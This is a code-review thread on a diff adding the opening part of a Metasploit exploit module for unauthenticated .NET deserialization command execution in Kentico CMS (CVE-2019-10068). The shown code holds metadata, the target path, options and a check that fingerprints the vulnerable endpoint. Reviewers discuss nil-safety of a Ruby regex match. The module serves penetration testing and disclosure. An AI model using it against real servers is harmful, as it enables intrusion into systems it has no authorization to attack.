modules/exploits/windows/http/kentico_staging_syncserver.rb

```diff
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Kentico CMS Staging SyncServer Unserialize Remote Command Execution',
+      'Description' => %q{
+        This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.
+        Remote Command Execution is possible via unauthenticated XML requests to the Staging Service
+        SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML
+        input is passed to an insecure .NET deserialize call which allows for remote command execution.
+      },
+      'DisclosureDate' => '2019-04-15',
+      'Author' =>
+        [
+          'Manoj Cherukuri',  # Discovery
+          'Justin LeMay',     # Discovery
+          'aushack',          # msf exploit
+        ],
+      'References' =>
+        [
+          ['CVE', '2019-10068'],
+          ['URL', 'https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/']
+        ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'win',
+      'Arch' => ARCH_CMD,
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'Payload' => { 'DisableNops' => true },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'Path to SyncServer.asmx', '/CMSPages/Staging/SyncServer.asmx']),
+      Opt::RPORT(80)
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+
+    if res && res.body && res.body.to_s =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
```

Comment:
`=~` is `nil` safe.

```suggestion
    if res && res.body =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
```

Reply:
I think it breaks if body is nil which happened in some other modules.

Reply:
It shouldn't. The usual issues are trying to perform `=~` on `res.body` when `res` is `nil`, or performing `res.body.include?` without casting `to_s`.

Reply:
yes, as @bcoles suggested, this extra check is not necessary, `=~`is `nil` safe:
```ruby
2.6.5 :001 > var = nil
 => nil
2.6.5 :002 > var =~ /foo/
 => nil
```